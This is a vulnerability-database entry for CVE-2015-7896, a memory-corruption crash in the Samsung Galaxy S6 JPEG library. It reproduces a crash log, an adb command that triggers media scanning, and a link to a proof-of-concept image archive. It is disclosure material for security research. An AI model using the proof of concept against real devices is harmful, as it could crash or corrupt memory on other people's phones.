Sign-up

ID

VAR-E-201511-0233


CVE

cve_id:CVE-2015-7896

Trust: 2.4

sources: BID: 77425 // PACKETSTORM: 134198 // EXPLOIT-DB: 38612 // EDBNET: 59688

EDB ID

38612


TITLE

Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash - Android dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38612

DESCRIPTION

Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash. CVE-2015-7896CVE-129756 . dos exploit for Android platform

Trust: 0.6

sources: EXPLOIT-DB: 38612

AFFECTED PRODUCTS

vendor:samsungmodel:galaxy s6scope: - version: -

Trust: 1.6

vendor:samsungmodel:galaxy s6 libqjpeg dointegralupsamplescope: - version: -

Trust: 0.5

vendor:samsungmodel:galaxy s6scope:eqversion:0

Trust: 0.3

sources: BID: 77425 // PACKETSTORM: 134198 // EXPLOIT-DB: 38612 // EDBNET: 59688

EXPLOIT

Source: https://code.google.com/p/google-security-research/issues/detail?id=498

The attached jpg, upsample.jpg can cause memory corruption when media scanning occurs

F/libc ( 8600): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x206e6f69747562 in tid 8685 (HEAVY#0)
I/DEBUG ( 2956): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 2956): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG ( 2956): Revision: '10'
I/DEBUG ( 2956): ABI: 'arm64'
I/DEBUG ( 2956): pid: 8600, tid: 8685, name: HEAVY#0 >>> com.samsung.dcm:DCMService <<<
I/DEBUG ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
I/DEBUG ( 2956): x0 0000007f8cef2ab0 x1 0000000000000002 x2 0000007f8cef2ab0 x3 0000007f8ce5a390
I/DEBUG ( 2956): x4 0000007f8cef28d0 x5 3d206e6f69747562 x6 0000007f8cef29f0 x7 42e34ca342e32177
I/DEBUG ( 2956): x8 42e390a242e37199 x9 42dfe02f42debc0f x10 42e06c3442e03665 x11 42e0afd542e08c24
I/DEBUG ( 2956): x12 42e1070042e0e62d x13 42e1830842e146da x14 42e1f53342e1add4 x15 00000000000014a4
I/DEBUG ( 2956): x16 0000007f9f0d6ae0 x17 0000007fa3e7e880 x18 0000007f8ce75c60 x19 0000007f8cebe000
I/DEBUG ( 2956): x20 0000000000000001 x21 0000007f8cebe000 x22 0000000000000001 x23 0000000000000000
I/DEBUG ( 2956): x24 0000000000000000 x25 0000000000000000 x26 0000000010000000 x27 0000007f8c5ff050
I/DEBUG ( 2956): x28 0000007f8ce77800 x29 000000000000001c x30 0000007f9f09fff8
I/DEBUG ( 2956): sp 0000007f8d0fea20 pc 0000007f9f09e83c pstate 0000000080000000
I/DEBUG ( 2956):
I/DEBUG ( 2956): backtrace:
I/DEBUG ( 2956): #00 pc 000000000009b83c /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG ( 2956): #01 pc 000000000009cff4 /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)
I/DEBUG ( 2956): #02 pc 0000000000035700 /system/lib64/libQjpeg.so (WINKJ_ProgProcessData+236)
I/DEBUG ( 2956): #03 pc 0000000000041f08 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+688)
I/DEBUG ( 2956): #04 pc 00000000000428d4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG ( 2956): #05 pc 0000000000042a08 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG ( 2956): #06 pc 000000000004420c /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG ( 2956): #07 pc 00000000000a4234 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG ( 2956): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG ( 2956): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG ( 2956): #10 pc 00000000000018ec /system/framework/arm64/saiv.odex

To reproduce, download the image file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/

Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38612.zip

Trust: 1.0

sources: EXPLOIT-DB: 38612

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38612

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38612

TYPE

libQjpeg DoIntegralUpsample Crash

Trust: 1.6

sources: EXPLOIT-DB: 38612 // EDBNET: 59688

TAGS

tag:exploit

Trust: 0.5

tag:proof of concept

Trust: 0.5

sources: PACKETSTORM: 134198

CREDITS

Google Security Research

Trust: 0.6

sources: EXPLOIT-DB: 38612

EXTERNAL IDS

db:NVDid:CVE-2015-7896

Trust: 2.4

db:EXPLOIT-DBid:38612

Trust: 1.6

db:EDBNETid:59688

Trust: 0.6

db:PACKETSTORMid:134198

Trust: 0.5

db:BIDid:77425

Trust: 0.3

sources: BID: 77425 // PACKETSTORM: 134198 // EXPLOIT-DB: 38612 // EDBNET: 59688

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2015-7896

Trust: 2.1

url:https://code.google.com/p/google-security-research/issues/detail?id=498

Trust: 1.3

url:https://www.exploit-db.com/exploits/38612/

Trust: 0.6

url:http://www.samsung.com/

Trust: 0.3

sources: BID: 77425 // PACKETSTORM: 134198 // EXPLOIT-DB: 38612 // EDBNET: 59688

SOURCES

db:BIDid:77425
db:PACKETSTORMid:134198
db:EXPLOIT-DBid:38612
db:EDBNETid:59688

LAST UPDATE DATE

2022-07-27T09:21:42.604000+00:00


SOURCES UPDATE DATE

db:BIDid:77425date:2015-11-03T00:00:00

SOURCES RELEASE DATE

db:BIDid:77425date:2015-11-03T00:00:00
db:PACKETSTORMid:134198date:2015-11-03T13:33:33
db:EXPLOIT-DBid:38612date:2015-11-03T00:00:00
db:EDBNETid:59688date:2015-11-03T00:00:00